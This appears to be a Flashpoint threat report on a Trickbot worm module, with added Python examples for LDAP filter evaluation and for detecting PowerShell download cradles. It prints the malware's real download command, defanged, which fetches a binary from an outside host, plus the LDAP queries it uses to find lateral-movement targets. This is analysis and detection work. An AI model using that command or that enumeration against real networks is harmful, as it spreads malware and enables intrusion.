On July 27, 2017, in coordination with Luciano Martins, Director of Cyber Risk Services at Deloitte, Flashpoint observed a new version – “1000029” – of the formidable “Trickbot” banking Trojan with a new “worm64Dll” module, spread via the email spam vector, impersonating invoices from a large international financial institution.

Image 1: The latest Trickbot tt0002 config that was served via the spam campaign.

The Trickbot gang appears to be testing a worm-like propagation module that spreads locally over Server Message Block (SMB), enumerates the servers visible in a domain via the NetServerEnum Windows API, and enumerates other computers via Lightweight Directory Access Protocol (LDAP) queries. As of this writing, this feature does not appear to be fully implemented by the criminal gang: the purported SMB exploit the module is built around has not yet been observed.

Image 2: Trickbot’s worm module obtains a list of servers via NetServerEnum and scans LDAP resources.

Trickbot's "MachineFinder" and "netscan" functions appear to leverage the following techniques:

• NetServerEnum enumeration

• LDAP enumeration

Image 3: The NetServerEnum function lists all servers of the specified type that are visible in a domain.

Trickbot's worm module also issues the following LDAP filters:

• (objectCategory=computer)

• (&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

The OID 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND extensible match, and 8192 (0x2000) is the SERVER_TRUST_ACCOUNT flag of userAccountControl, so the second filter matches exactly the domain controllers. Taken together, the two queries let the malware enumerate all computers that are not domain controllers; it then resolves their hostnames to IP addresses via the gethostbyname and inet_ntoa Windows APIs.

Image 4: Trickbot queries LDAP for all computers that are not domain controllers.
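The following is an added example, not Trickbot's code or anything recovered from the module, that evaluates the two observed LDAP filters against a constructed directory so the bit-AND matching rule and the "computers minus domain controllers" result can be seen concretely. It goes one step beyond the page by also showing the same target set expressed as a single filter with LDAP negation. All object names, userAccountControl values, hostnames and IP addresses are made up, and a dictionary stands in for gethostbyname/inet_ntoa so nothing is resolved on the network.

```python
# Added example (not Trickbot's code): evaluating the observed LDAP filters against a
# constructed directory. Objects, hostnames and addresses below are made up.

SERVER_TRUST_ACCOUNT = 0x2000                 # 8192: userAccountControl bit set on DC computer objects
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"

ALL_COMPUTERS = "(objectCategory=computer)"
DOMAIN_CONTROLLERS = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))"
# Same target set in one query using LDAP negation (not one of the observed filters):
NON_DC_COMPUTERS = "(&(objectCategory=computer)(!(userAccountControl:1.2.840.113556.1.4.803:=8192)))"

# Constructed sample objects. Real objectCategory values are DNs; AD also accepts the short form.
DIRECTORY = [
    {"cn": "DC01", "objectCategory": "computer", "userAccountControl": 0x82000, "dNSHostName": "dc01.corp.example"},
    {"cn": "WS01", "objectCategory": "computer", "userAccountControl": 0x1000,  "dNSHostName": "ws01.corp.example"},
    {"cn": "WS02", "objectCategory": "computer", "userAccountControl": 0x1000,  "dNSHostName": "ws02.corp.example"},
    {"cn": "FS01", "objectCategory": "computer", "userAccountControl": 0x1000,  "dNSHostName": "fs01.corp.example"},
    {"cn": "jdoe", "objectCategory": "person",   "userAccountControl": 0x200},
]
# Offline stand-in for gethostbyname/inet_ntoa (constructed addresses).
RESOLVER = {"dc01.corp.example": "10.0.0.1", "ws01.corp.example": "10.0.0.11",
            "ws02.corp.example": "10.0.0.12", "fs01.corp.example": "10.0.0.20"}


def parse_filter(s, pos=0):
    """Minimal RFC 4515 parser: (&...), (|...), (!...), (attr=value), (attr:rule:=value)."""
    if s[pos] != "(":
        raise ValueError("expected '(' at %d" % pos)
    pos += 1
    if s[pos] in "&|!":
        op, pos, subs = s[pos], pos + 1, []
        while s[pos] == "(":
            node, pos = parse_filter(s, pos)
            subs.append(node)
        if s[pos] != ")":
            raise ValueError("unterminated compound filter")
        return (op, subs), pos + 1
    end = s.index(")", pos)
    lhs, value = s[pos:end].split("=", 1)
    attr, rule = (lhs.split(":")[0], lhs.split(":")[1]) if ":" in lhs else (lhs, None)
    return ("cmp", attr, rule, value), end + 1


def matches(node, obj):
    kind = node[0]
    if kind == "&":
        return all(matches(n, obj) for n in node[1])
    if kind == "|":
        return any(matches(n, obj) for n in node[1])
    if kind == "!":
        return not matches(node[1][0], obj)
    _, attr, rule, value = node
    if attr not in obj:                       # an absent attribute never matches
        return False
    if rule == LDAP_MATCHING_RULE_BIT_AND:    # true when every bit of value is set in the attribute
        return (int(obj[attr]) & int(value)) == int(value)
    if rule is not None:
        raise ValueError("unsupported matching rule " + rule)
    return str(obj[attr]).lower() == value.lower()   # AD string attributes compare case-insensitively


def search(filter_str, directory=DIRECTORY):
    """Return the cn of every object the filter matches, in directory order."""
    node, _ = parse_filter(filter_str)
    return [o["cn"] for o in directory if matches(node, o)]


def lateral_targets(directory=DIRECTORY):
    """What the worm module ends up with: non-DC computers resolved to (hostname, IP)."""
    dcs = set(search(DOMAIN_CONTROLLERS, directory))
    by_cn = {o["cn"]: o for o in directory}
    return [(by_cn[cn]["dNSHostName"], RESOLVER.get(by_cn[cn]["dNSHostName"]))
            for cn in search(ALL_COMPUTERS, directory) if cn not in dcs]


if __name__ == "__main__":
    print("domain controllers:", search(DOMAIN_CONTROLLERS))
    print("targets:", lateral_targets())
```

On a real domain the same two filters can be issued by any authenticated user, so the enumeration itself is not distinguishable from normal directory traffic; what stands out is a workstation issuing them against the whole domain and then opening SMB to every result.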

The Trickbot module also contains strings indicative of pysmb, a Python implementation of the SMB protocol, negotiating the "NT LM 0.12" SMB dialect and checking for Windows 2007, Windows 7, Windows 2012, and Windows 8 operating systems (OS).

Images 5-6: The observed Trickbot worm module uses SMB to determine whether a host can be exploited; however, the module does not appear to be fully implemented yet.

Finally, the malware appears to leverage the IPC$ (interprocess communication) share to propagate and execute a PowerShell script as a final payload that downloads another Trickbot binary, masked as "setup[.]exe," into the shared drive. Notably, this malware does not appear to have logic to randomly scan external IPs for SMB connections, as was the case for the worm that spread the "WannaCry" ransomware in May 2017.

The following PowerShell script was observed in the worm module:

powershell -Command "(New-Object Net.WebClient).DownloadFile('hxxp://c93211do[.]beget[.]tech/worm[.]bin[.]exe', 'setup[.]exe')"
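The following is an added detection example, not Flashpoint's or Trickbot's code, that runs over constructed process-creation events (in the shape of Windows event 4688 with the command line logged) and flags the WebClient download cradle shown above, extracting the URL, its domain and the destination file, and matching the domain against an IOC list given in the defanged form reports use. The sample events, the host names and the dropper domain "dropper.example" are all made up.

```python
# Added detection example (not Flashpoint's or Trickbot's code) for the PowerShell download
# cradle above. Events and the dropper domain below are constructed.
import re
from urllib.parse import urlparse

EVENTS = [  # constructed sample log lines in 4688 shape
    "4688 host=WS01 parent=services.exe cmd=powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "4688 host=WS02 parent=cmd.exe cmd=powershell -Command \"(New-Object Net.WebClient).DownloadFile("
    "'http://dropper.example/worm.bin.exe', 'setup.exe')\"",
    "4688 host=FS01 parent=explorer.exe cmd=notepad.exe C:\\notes.txt",
]

EVENT_RE = re.compile(r"^(?P<id>\d+) host=(?P<host>\S+) parent=(?P<parent>\S+) cmd=(?P<cmd>.*)$")
POWERSHELL_RE = re.compile(r"(?:^|\\)powershell(?:\.exe)?\b", re.IGNORECASE)
# Literal WebClient.DownloadFile cradle with single- or double-quoted arguments.
CRADLE_RE = re.compile(
    r"New-Object\s+(?:System\.)?Net\.WebClient\)\s*\.DownloadFile\(\s*"
    r"(?P<q1>['\"])(?P<url>.+?)(?P=q1)\s*,\s*(?P<q2>['\"])(?P<dest>.+?)(?P=q2)\s*\)",
    re.IGNORECASE)


def refang(ioc):
    """Turn report-style defanged IOCs (hxxp, [.]) into the form that appears in real logs."""
    return re.sub(r"^hxxp", "http", ioc.replace("[.]", "."), flags=re.IGNORECASE)


def parse_event(line):
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError("unrecognised event line: " + line)
    return m.groupdict()


def detect_cradle(line):
    """Return an alert dict if the command line is a PowerShell WebClient download cradle."""
    ev = parse_event(line)
    if ev["id"] != "4688" or not POWERSHELL_RE.search(ev["cmd"]):
        return None
    m = CRADLE_RE.search(ev["cmd"])
    if not m:
        return None
    url, dest = m.group("url"), m.group("dest")
    return {
        "host": ev["host"], "parent": ev["parent"], "url": url,
        "domain": (urlparse(url).hostname or "").lower(), "dest": dest,
        # A bare filename is written to the process's current directory; for a process
        # started through a share that can be the share itself, as the text above describes.
        "relative_dest": re.match(r"^(?:[A-Za-z]:\\|\\\\|/)", dest) is None,
    }


def scan(events=EVENTS, defanged_iocs=()):
    """Alerts for every cradle seen, tagging those whose domain is in a defanged IOC list."""
    ioc_domains = {urlparse(refang(i)).hostname for i in defanged_iocs}
    alerts = [a for a in (detect_cradle(e) for e in events) if a]
    for a in alerts:
        a["ioc_hit"] = a["domain"] in ioc_domains
    return alerts


if __name__ == "__main__":
    for alert in scan(defanged_iocs=["hxxp://dropper[.]example/worm[.]bin[.]exe"]):
        print(alert)
```

The regex catches only the literal cradle form; variants built with string concatenation, -EncodedCommand or Invoke-Expression need PowerShell script block logging (event 4104) rather than the process command line. On the share side, event 5140 (network share object accessed) for IPC$ and ADMIN$ from a workstation that is not an administrative host is the complementary signal for this propagation path.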

Assessment

The Trickbot banking Trojan gang continues to have a global impact, targeting financial institutions across the world and tirelessly sending sizable daily spam waves into various geographies. Now, the gang appears to be testing a new module with worm-like capabilities for lateral movement, i.e., the ability to infect other computers on the same Local Area Network (LAN), with the goal of infecting more victims and enlisting them in the botnet. Such worm-like infections might help the Trickbot gang reach more customers of financial institutions and so conduct more account takeover (ATO) fraud.

Even though the worm module appears to be rather crude in its present state, it is evident that the Trickbot gang learned from the global ransomware worm-like outbreaks of WannaCry and “NotPetya” and is attempting to replicate their methodology. Flashpoint assesses with moderate confidence that the Trickbot gang will likely continue to be a formidable force in the near term.